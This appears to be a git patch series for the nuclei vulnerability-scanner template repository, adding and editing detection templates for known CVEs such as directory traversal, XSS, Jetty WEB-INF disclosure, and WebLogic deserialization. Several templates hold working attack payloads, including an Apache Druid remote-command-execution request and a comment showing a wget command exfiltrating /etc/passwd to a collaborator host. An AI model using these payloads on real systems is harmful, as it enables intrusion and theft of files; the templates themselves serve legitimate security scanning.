GwanYeong Kim Date: Thu, 24 Jun 2021 14:36:45 +0900 Subject: [PATCH 0050/4083] Create CVE-2021-21234.yaml spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-21234.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-21234.yaml diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml new file mode 100644 index 0000000000..8d2832668a --- /dev/null +++ b/cves/2021/CVE-2021-21234.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-21234 + +info: + name: Spring Boot Actuator Logview - Directory Traversal + author: gy741 + severity: high + reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234 + tags: cve,cve2021,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From f7563d9718549842228d981d6b689f12b0bed7ec Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Jun 2021 16:45:07 +0530 Subject: [PATCH 0051/4083] Update CVE-2019-3401.yaml --- cves/2019/CVE-2019-3401.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml index 228b23a35b..7bb6581bc6 100644 --- a/cves/2019/CVE-2019-3401.yaml +++ b/cves/2019/CVE-2019-3401.yaml @@ -4,7 +4,7 @@ info: name: Atlassian JIRA Information Exposure (CVE-2019-3401) author: milo2012 severity: low - tags: cve,cve2019,jira + tags: cve,cve2019,jira,atlassian requests: - method: GET @@ -14,3 +14,5 @@ requests: - type: word words: - '' + - 'Manage Filters - Jira' + condition: and From 37261f7a2f14849963b32a835a3fa09174396795 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 24 Jun 2021 16:52:04 +0530 Subject: [PATCH 0052/4083] Update and rename vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml to cves/2019/CVE-2019-3401.yaml --- .../2019/CVE-2019-3401.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml => cves/2019/CVE-2019-3401.yaml (70%) diff --git a/vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml b/cves/2019/CVE-2019-3401.yaml similarity index 70% rename from vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml rename to cves/2019/CVE-2019-3401.yaml index 2d3932da70..929a402725 100644 --- a/vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml +++ b/cves/2019/CVE-2019-3401.yaml @@ -1,10 +1,10 @@ -id: jira-unauth-popular-filters +id: CVE-2019-3401 info: - name: Jira Unauthenticated Popular Filters - author: TechbrunchFR + name: Atlassian JIRA Information Exposure (CVE-2019-3401) + author: TechbrunchFR,milo2012 severity: info - tags: atlassian,jira + tags: cve,cve2019,jira,atlassian requests: - method: GET @@ -13,7 +13,9 @@ requests: matchers: - type: word words: - - 'filterlink_' + - '' + - 'Manage Filters - Jira' + condition: and # Remediation: # Ensure that this permission is restricted to specific groups that require it. From e7bb4bff237efb557c3e8a56f4c6096f0ed35d2a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 24 Jun 2021 21:07:17 +0900 Subject: [PATCH 0053/4083] Create CVE-2021-3223.yaml Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-3223.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2021/CVE-2021-3223.yaml diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml new file mode 100644 index 0000000000..6974cdba27 --- /dev/null +++ b/cves/2021/CVE-2021-3223.yaml @@ -0,0 +1,22 @@ +id: CVE-2021-3223 + +info: + name: Node RED Dashboard - Directory Traversal + author: gy741 + severity: high + description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. + reference: | + - https://github.com/node-red/node-red-dashboard/issues/669 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 + tags: cve,cve2020,node-red-dashboard,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" From 19d80d9d0a0fce169722b18e1b15e5558bc25f81 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 24 Jun 2021 15:34:19 +0000 Subject: [PATCH 0054/4083] Create CVE-2020-3580.yaml --- cves/2020/CVE-2020-3580.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-3580.yaml diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml new file mode 100644 index 0000000000..e0b40aa1e4 --- /dev/null +++ b/cves/2020/CVE-2020-3580.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-3580 + +info: + name: Cisco ASA XSS + author: pikpikcu + severity: medium + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2020-3580 + - https://twitter.com/ptswarm/status/1408050644460650502 + description: | + Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. + tags: xss,cve,cve2020,cisco + +requests: + - raw: + - | + POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Content-Length: 44 + + SAMLResponse="> + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 From cb18f313fd98c9779100a4d28dd5d68363c9d0d2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 24 Jun 2021 15:41:18 +0000 Subject: [PATCH 0055/4083] Create huawei-hg659-lfi.yaml --- vulnerabilities/other/huawei-hg659-lfi.yaml | 26 +++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/huawei-hg659-lfi.yaml diff --git a/vulnerabilities/other/huawei-hg659-lfi.yaml b/vulnerabilities/other/huawei-hg659-lfi.yaml new file mode 100644 index 0000000000..9ecdf99635 --- /dev/null +++ b/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -0,0 +1,26 @@ +id: huawei-hg659-lfi + +info: + name: HUAWEI HG659 LFI + author: pikpikcu + severity: high + reference: | + - https://twitter.com/sec715/status/1406782172443287559 + tags: lfi,huawei + +requests: + - method: GET + path: + - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 9cc9a52db2b5905d10b85416d728689f3e3b87c7 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 24 Jun 2021 15:49:12 +0000 Subject: [PATCH 0056/4083] Create CVE-2017-12794.yaml --- cves/2017/CVE-2017-12794.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2017/CVE-2017-12794.yaml diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml new file mode 100644 index 0000000000..cbf3516606 --- /dev/null +++ b/cves/2017/CVE-2017-12794.yaml @@ -0,0 +1,28 @@ +id: CVE-2017-12794 + +info: + name: Django debug page XSS + author: pikpikcu + severity: medium + reference: | + - https://twitter.com/sec715/status/1406779605055270914 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 + description: | + In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. + tags: xss,django,cve,cve2017 + +requests: + - method: GET + path: + - "{{BaseURL}}/create_user/?username=" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 From b97d012636f690e0432fdef0ef9f915c39cead86 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 24 Jun 2021 16:00:02 +0000 Subject: [PATCH 0057/4083] Create CVE-2021-28169.yaml --- cves/2021/CVE-2021-28169.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-28169.yaml diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml new file mode 100644 index 0000000000..9e4a64199a --- /dev/null +++ b/cves/2021/CVE-2021-28169.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-28169 + +info: + name: Jetty Utility Servlets Information Disclosure + author: pikpikcu + severity: info + reference: | + - https://twitter.com/sec715/status/1406787963569065988 + - https://nvd.nist.gov/vuln/detail/CVE-2021-28169 + description: | + For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. + tags: cve,cve2021,jetty + +requests: + - method: GET + path: + - "{{BaseURL}}/static?/%2557EB-INF/web.xml" + - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: application/xml" + part: header + + - type: word + words: + - "" + - "" + part: body + + - type: status + status: + - 200 From 0d7348b33de7c3934bafebe59251f66ad068396f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 22:13:10 +0530 Subject: [PATCH 0058/4083] Added version extractors --- network/weblogic-t3-detect.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/network/weblogic-t3-detect.yaml b/network/weblogic-t3-detect.yaml index 3354242dac..2b68d6cb2f 100644 --- a/network/weblogic-t3-detect.yaml +++ b/network/weblogic-t3-detect.yaml @@ -2,7 +2,7 @@ id: weblogic-t3-detect info: name: Detect Weblogic T3 Protocol - author: F1tz + author: F1tz,milo2012 severity: info description: Check T3 protocol status. tags: network,weblogic @@ -14,7 +14,15 @@ network: host: - "{{Hostname}}" read-size: 1024 + matchers: - type: word words: - - "HELO" \ No newline at end of file + - "HELO" + + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" \ No newline at end of file From 6bb53830734513c2ee6bf40491c40639266803ca Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 22:14:38 +0530 Subject: [PATCH 0059/4083] Update weblogic-t3-detect.yaml --- network/weblogic-t3-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/weblogic-t3-detect.yaml b/network/weblogic-t3-detect.yaml index 2b68d6cb2f..d2e50b328a 100644 --- a/network/weblogic-t3-detect.yaml +++ b/network/weblogic-t3-detect.yaml @@ -25,4 +25,4 @@ network: part: body group: 1 regex: - - "HELO:(.*).false" \ No newline at end of file + - "HELO:(.*).false" \ No newline at end of file From 81dd821b03d32bfdee475de75bc0ae90bdf0648c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 24 Jun 2021 16:59:05 +0000 Subject: [PATCH 0060/4083] Create avtech-dvr-exposure.yaml --- exposed-panels/avtech-dvr-exposure.yaml | 26 +++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/avtech-dvr-exposure.yaml diff --git a/exposed-panels/avtech-dvr-exposure.yaml b/exposed-panels/avtech-dvr-exposure.yaml new file mode 100644 index 0000000000..c27dd4e837 --- /dev/null +++ b/exposed-panels/avtech-dvr-exposure.yaml @@ -0,0 +1,26 @@ +id: avtech-dvr-exposure + +info: + name: Avtech AVC798HA DVR Information Exposure + description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. + reference: http://www.avtech.com.tw/ + author: geeknik + severity: low + tags: dvr,exposure,avtech + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/nobody/Machine.cgi?action=get_capability" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Firmware.Version=" + - "MACAddress=" + - "Product.Type=" + condition: and From ac78422f5dac7a96b500e392a7776119a97f9ec4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 24 Jun 2021 17:00:51 +0000 Subject: [PATCH 0061/4083] Update avtech-dvr-exposure.yaml --- exposed-panels/avtech-dvr-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/avtech-dvr-exposure.yaml b/exposed-panels/avtech-dvr-exposure.yaml index c27dd4e837..f3f362bcc8 100644 --- a/exposed-panels/avtech-dvr-exposure.yaml +++ b/exposed-panels/avtech-dvr-exposure.yaml @@ -3,7 +3,7 @@ id: avtech-dvr-exposure info: name: Avtech AVC798HA DVR Information Exposure description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. - reference: http://www.avtech.com.tw/ + reference: http://www.avtech.com.tw/ author: geeknik severity: low tags: dvr,exposure,avtech From a192570ddfe050eed3956800e7ccfda57682612b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Jun 2021 17:02:18 +0000 Subject: [PATCH 0062/4083] Auto Update README [Thu Jun 24 17:02:18 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1ea0faa33e..52d8db6974 100644 --- a/README.md +++ b/README.md @@ -38,7 +38,7 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 357 | vulnerabilities | 199 | exposed-panels | 154 | +| cves | 358 | vulnerabilities | 198 | exposed-panels | 154 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | From 16e5ad7fadf58acdaec086e1b3bdffe2c7a02512 Mon Sep 17 00:00:00 2001 From: wyatt Date: Thu, 24 Jun 2021 13:37:45 -0400 Subject: [PATCH 0063/4083] The default request never flagged druid in my env. Replaced with MSF request and it flags everytime now --- cves/2021/CVE-2021-25646.yaml | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index d1e7e68100..71fd070b06 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -13,22 +13,16 @@ info: requests: - raw: - | - POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1 + POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) + Accept: application/json, text/plain, */* Content-Type: application/json - Content-Length: 1006 + Content-Length: 571 Connection: close - {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript", - "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}", - "dimension": "added", - "": { - "enabled": "true" - } - } - } - },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}} + + {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"odgjxrrrePz","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~echo lgxTckL7cwJwki6GTZbjf9gF6BTSZTGO\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}} # To read system Files, replace (wget example.com) with below payload # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net From 809668943f3d9283fa0f6c609f068195eea3a2d3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 23:54:29 +0530 Subject: [PATCH 0064/4083] minor changes --- cves/2021/CVE-2021-28164.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 6c5d5c88ba..8a507e6cbd 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -1,31 +1,31 @@ id: CVE-2021-28164 info: - name: Authorization Before Parsing and Canonicalization in jetty + name: Jetty Authorization Before Parsing and Canonicalization author: noamrathaus severity: high description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. reference: | - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 + - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty requests: - method: GET path: - - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" - - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" + - "{{BaseURL}}/%2e/WEB-INF/web.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "/weaver/" + - "" part: body - type: word From a9a161f8c62f0467a03e030bc2fd00fb8ccc7d58 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 23:56:33 +0530 Subject: [PATCH 0065/4083] Update CVE-2021-28164.yaml --- cves/2021/CVE-2021-28164.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 8a507e6cbd..a12313586b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -5,8 +5,7 @@ info: author: noamrathaus severity: high description: | - Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. - This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. reference: | - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty From 26a69812639cd95f5ffc946d325f2e52de4fd4a0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Jun 2021 18:28:46 +0000 Subject: [PATCH 0066/4083] Auto Update README [Thu Jun 24 18:28:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 52d8db6974..5697d97481 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 358 | vulnerabilities | 198 | exposed-panels | 154 | +| cves | 359 | vulnerabilities | 198 | exposed-panels | 154 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1343 files**. +**119 directories, 1344 files**. From a736120dc0f5c3de48228a134f619dfad7c1c7fe Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 25 Jun 2021 00:02:05 +0530 Subject: [PATCH 0067/4083] minor updates --- cves/2021/CVE-2021-28169.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index 9e4a64199a..23375aa842 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -22,14 +22,15 @@ requests: - type: word words: - - "Content-Type: application/xml" + - "application/xml" part: header - type: word words: - - "" - - "" + - "" + - "java.sun.com" part: body + condition: and - type: status status: From 552cf0967274b2014fde0348054c87ebd8bf5fb0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 24 Jun 2021 18:33:07 +0000 Subject: [PATCH 0068/4083] Auto Update README [Thu Jun 24 18:33:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5697d97481..142b015819 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 359 | vulnerabilities | 198 | exposed-panels | 154 | +| cves | 360 | vulnerabilities | 198 | exposed-panels | 154 | | takeovers | 68 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 25 | | default-logins | 31 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**119 directories, 1344 files**. +**119 directories, 1345 files**. From 426abedcfae84ddf555d494612616d0b1fc6e03f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 25 Jun 2021 00:05:59 +0530 Subject: [PATCH 0069/4083] severity updates as per CVE database --- cves/2021/CVE-2021-28164.yaml | 4 +++- cves/2021/CVE-2021-28169.yaml | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index a12313586b..a62da7df33 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -3,7 +3,7 @@ id: CVE-2021-28164 info: name: Jetty Authorization Before Parsing and Canonicalization author: noamrathaus - severity: high + severity: medium description: | The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. reference: | @@ -25,7 +25,9 @@ requests: - type: word words: - "" + - "java.sun.com" part: body + condition: and - type: word part: header diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index 23375aa842..09ad71064e 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -3,7 +3,7 @@ id: CVE-2021-28169 info: name: Jetty Utility Servlets Information Disclosure author: pikpikcu - severity: info + severity: medium reference: | - https://twitter.com/sec715/status/1406787963569065988 - https://nvd.nist.gov/vuln/detail/CVE-2021-28169 From 7db13c6bce3ec5c44fabf91cbc3f526ca9d203d1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 25 Jun 2021 00:08:05 +0530 Subject: [PATCH 0070/4083] Duplicate template --- cves/2019/CVE-2019-3401.yaml | 18 ------------------ 1 file changed, 18 deletions(-) delete mode 100644 cves/2019/CVE-2019-3401.yaml diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml deleted file mode 100644 index 7bb6581bc6..0000000000 --- a/cves/2019/CVE-2019-3401.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2019-3401 - -info: - name: Atlassian JIRA Information Exposure (CVE-2019-3401) - author: milo2012 - severity: low - tags: cve,cve2019,jira,atlassian - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa" - matchers: - - type: word - words: - - '' - - 'Manage Filters - Jira' - condition: and From 33a879e9d575d2ae0414599d58b3d737dedb0ffe Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 25 Jun 2021 00:12:06 +0530 Subject: [PATCH 0071/4083] updated attack type --- default-logins/aem/adobe-aem-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 2ec85a21ac..b6aacc7e67 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -35,7 +35,7 @@ requests: - password - password - attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb raw: - | From 4e888bf3e28461199b1e92704033a17c4336c668 Mon Sep 17 00:00:00 2001 From: Keith Date: Fri, 25 Jun 2021 03:38:53 +0800 Subject: [PATCH 0072/4083] Add CVE-2018-2893.yaml - Oracle WebLogic Server Deserialization RCE --- cves/2018/CVE-2018-2893.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-2893.yaml diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml new file mode 100644 index 0000000000..077f244662 --- /dev/null +++ b/cves/2018/CVE-2018-2893.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-2893 + +info: + name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) + author: milo2012 + severity: high + tags: cve,cve2018,weblogic + reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + +network: + - inputs: + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + read: 1024 + - data: "000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b